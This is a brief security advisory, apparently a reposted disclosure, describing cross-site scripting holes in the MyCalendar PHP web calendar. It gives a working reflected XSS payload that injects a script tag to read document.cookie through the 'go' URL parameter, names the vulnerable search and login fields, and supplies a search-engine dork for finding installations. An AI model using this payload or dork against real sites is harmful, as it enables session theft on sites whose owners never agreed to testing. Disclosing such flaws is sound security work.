* site : http://abledesign.com/programs/MyCalendar/
* exploit :
XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
XSS on the url :
http://www.target.ma/calendar/index.php?go="><script>alert(document.cook
ie)</script>
XSS on the username and password at
http://www.target.ma/crown/cal/index.php?go=Login
* dork : intitle:"myCalendar"
* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.